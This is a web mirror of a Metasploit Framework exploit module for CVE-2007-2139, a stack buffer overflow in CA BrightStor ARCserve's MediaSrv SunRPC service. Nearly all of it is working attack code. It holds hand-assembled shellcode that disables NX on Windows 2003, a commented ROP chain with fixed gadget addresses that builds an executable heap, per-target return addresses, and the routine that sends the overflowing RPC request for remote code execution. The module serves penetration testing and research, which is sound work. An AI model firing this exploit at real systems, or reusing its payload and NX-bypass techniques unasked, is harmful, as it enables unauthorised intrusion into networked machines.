Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::SunRPC

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow',

16
        'Description' => %q{

17
          This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA

18
          BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker

19
          can overflow a stack buffer and execute arbitrary code.

20
        },

21
        'Author' => [ 'toto' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2007-2139'],

25
          [ 'OSVDB', '35326' ],

26
          [ 'BID', '23635'],

27
          [ 'ZDI', '07-022'],

28
        ],

29
        'Privileged' => true,

30
        'Platform' => 'win',

31
        'Payload' => {

32
          'Space' => 0x300,

33
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c_",

34
          'Prepend' =>

35
                          # Disable NX on 2k3 to upload data on the stack

36
                          # (service crashes if the stack is switched to the heap)

37
                          "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB

38
                          "\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5  ; MajorVersion == 5

39
                          "\x75\x30" + # jnz after

40
                          "\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2  ; MinorVersion == 2

41
                          "\x75\x27" + # jnz after

42
                          "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece  ; BuildVersion (> SP0)

43
                          "\x76\x1b" + # jbe after

44
                          "\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]

45
                          "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300

46
                          "\xb8\xed\x00\x00\x00" + # mov eax, 0xed

47
                          "\x6a\x04" + # push 4

48
                          "\x51" + # push ecx

49
                          "\x6a\x22" + # push 22

50
                          "\x6a\xff" + # push -1

51
                          "\x6a\xff" + # push -1 (padding)

52
                          "\xff\x12", # call dword ptr[edx]

53
          'StackAdjustment' => -10000,

54


55
        },

56
        'Targets' => [

57
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)', { 'Ret' => 0x1002b715, 'Off' => 0x304 } ],

58
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)', { 'Ret' => 0x1002b715, 'Off' => 0x300 } ],

59
          ['BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)', { 'Ret' => 0x41414141 } ],

60
        ],

61
        'DisclosureDate' => '2007-04-25',

62
        'DefaultTarget' => 0,

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70
  end

71


72
  def exploit

73
    sunrpc_create('tcp', 0x6097e, 1)

74


75
    if target.name =~ /NX/

76
      # summary:

77
      #

78
      # 1) get the payload address

79
      # 2) copy the payload into a fixed buffer (data section)

80
      # 3) allocate an executable heap buffer (to bypass NX)

81
      # 4) copy back the payload into the heap

82
      # 5) jmp to the payload in the heap

83
      #

84
      # step 1: jmp arround the atoi pointers

85
      #

86
      # add esp, 20h

87
      # retn

88
      #

89
      # step 2: get a pointer to the stack in ecx

90
      #

91
      # xor eax, eax

92
      # mov ecx, dword ptr fs:[0]

93
      # cmp dword ptr [ecx+4], offset __unwind_handler

94
      # jnz end

95
      # [...]

96
      # end:

97
      # retn

98
      #

99
      # step 3: mov the stack pointer in eax

100
      #

101
      # mov eax, ecx

102
      # add esp, 20h

103
      # retn

104
      #

105
      # step 4: set fffff824h in esi

106
      #

107
      # pop esi

108
      # retn

109
      #

110
      # step 5: add esi to eax (eax points to the payload in the stack)

111
      #

112
      # add eax, esi

113
      # pop esi

114
      # retn

115
      #

116
      # step 6: set edi to a buffer we can write (6d515301h)

117
      #

118
      # pop edi

119
      # retn

120
      #

121
      # step 7: copy the payload to the buffer

122
      #

123
      # push eax

124
      # push 	edi

125
      # call _strcpy_0

126
      # pop ecx

127
      # pop ecx

128
      # retn

129
      #

130
      # step 8: set ecx to ffffffh

131
      #

132
      # pop ecx

133
      # retn

134
      #

135
      # step 9: mov ecx to eax (ffffffff -> MEM_EXECUTABLE)

136
      #

137
      # mov eax, ecx

138
      # add esp, 20h

139
      # retn

140
      #

141
      # step 10: create an executable heap

142
      #

143
      # push 0

144
      # cmp [esp+4+arg_0], eax

145
      # push 1000h

146
      # setz al

147
      # push eax

148
      # call ds:HeapCreate    ; create a new heap (executable for NX)

149
      # test eax, eax

150
      # mov hHeap, eax

151
      # jz short loc_6d5071b5

152
      # call ___sbh_heap_init

153
      # test eax, eax

154
      # jnz short loc_6d5071b8

155
      # push hHeap

156
      # call ds:HeapDestroy

157
      # loc_6d5071b5:

158
      # xor eax, eax

159
      # retn

160
      # loc_6d5071b8:

161
      # push 1

162
      # pop eax

163
      # retn

164
      #

165
      # step 11: Allocate a new heap buffer (size 01060101h)

166
      #

167
      # push hHeap

168
      # call ds:HeapAlloc

169
      # pop edi

170
      # pop esi

171
      # retn

172
      #

173
      # step 12: set esi to the buffer containing the payload  (6d515301h)

174
      #

175
      # pop esi

176
      # retn

177
      #

178
      # step 13: copy the payload to the heap (executable)

179
      #

180
      # push esi

181
      # push eax

182
      # call _strcpy_0

183
      # pop ecx

184
      # pop ecx

185
      # pop esi

186
      # retn

187
      #

188
      # step 14: go to the heap

189
      #

190
      # call eax

191
      #

192
      # step 15:

193
      # if 2k3 the prepend data disables NX to upload and execute

194
      # data on the stack

195
      #

196
      # step 16: w00t!

197


198
      data = Rex::Text.rand_text_alphanumeric(0x600)

199


200
      # ret 1

201
      data[0x100, 4] = [ 0x6d5010e4 ].pack('V')

202


203
      # used to store the result of atoi

204
      data[0x108, 4] = [ 0x6d51652b ].pack('V')

205
      data[0x10C, 4] = [ 0x6d51652b ].pack('V')

206
      data[0x110, 4] = [ 0x6d51652b ].pack('V')

207
      data[0x114, 4] = [ 0x6d51652b ].pack('V')

208
      data[0x118, 4] = [ 0x6d51652b ].pack('V')

209
      data[0x11C, 4] = [ 0x6d51652b ].pack('V')

210


211
      # ret 2

212
      data[0x124, 4] = [ 0x6d50b27a ].pack('V')

213


214
      # ret 3

215
      data[0x128, 4] = [ 0x6d5010e2 ].pack('V')

216


217
      # ret 4

218
      data[0x14C, 4] = [ 0x6d50aa6d ].pack('V')

219
      data[0x150, 4] = [ 0xfffff824 ].pack('V')

220


221
      # ret 5

222
      data[0x154, 4] = [ 0x6d50aa6b ].pack('V')

223


224
      # ret 6

225
      data[0x15C, 4] = [ 0x6d5057a0 ].pack('V')

226
      data[0x160, 4] = [ 0x6d515301 ].pack('V')

227


228
      # ret 7

229
      data[0x164, 4] = [ 0x6d50b938 ].pack('V')

230


231
      # ret 8

232
      data[0x178, 4] = [ 0x6d502df0 ].pack('V')

233
      data[0x17C, 4] = [ 0xffffffff ].pack('V')

234


235
      # ret 9

236
      data[0x180, 4] = [ 0x6d5010e2 ].pack('V')

237


238
      # ret 10

239
      data[0x1a4, 4] = [ 0x6d507182 ].pack('V')

240


241
      # ret 11

242
      data[0x1a8, 4] = [ 0x6d505c2c ].pack('V')

243
      data[0x1ac, 4] = [ 0xffffffff ].pack('V')

244
      data[0x1b0, 4] = [ 0x01060101 ].pack('V')

245


246
      # ret 12

247
      data[0x1bc, 4] = [ 0x6d50aa6d ].pack('V')

248
      data[0x1c0, 4] = [ 0x6d515301 ].pack('V')

249


250
      # ret 13

251
      data[0x1c4, 4] = [ 0x6d50f648 ].pack('V')

252


253
      # ret 14

254
      data[0x1cc, 4] = [ 0x6d506867 ].pack('V')

255


256
      data[0x260, payload.encoded.length] = payload.encoded

257


258
    else

259
      data = Rex::Text.rand_text_alphanumeric(0xA64)

260
      off = target['Off']

261


262
      data[off, payload.encoded.length] = payload.encoded

263
      data[off + 0x73c, 2] = "\xeb\x06"

264
      data[off + 0x740, 4] = [ target.ret ].pack('V')

265
      data[off + 0x744, 5] = "\xe9\xb7\xf8\xff\xff"

266
    end

267


268
    data = "_" + data + "_1_1_1_1_1_1_1_1_1"

269


270
    request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)

271


272
    print_status("Trying target #{target.name}...")

273


274
    begin

275
      ret = sunrpc_call(0xf5, request)

276
      select(nil, nil, nil, 20)

277
    rescue

278
    end

279


280
    sunrpc_destroy

281


282
    handler

283
    disconnect

284
  end

285
end

286


287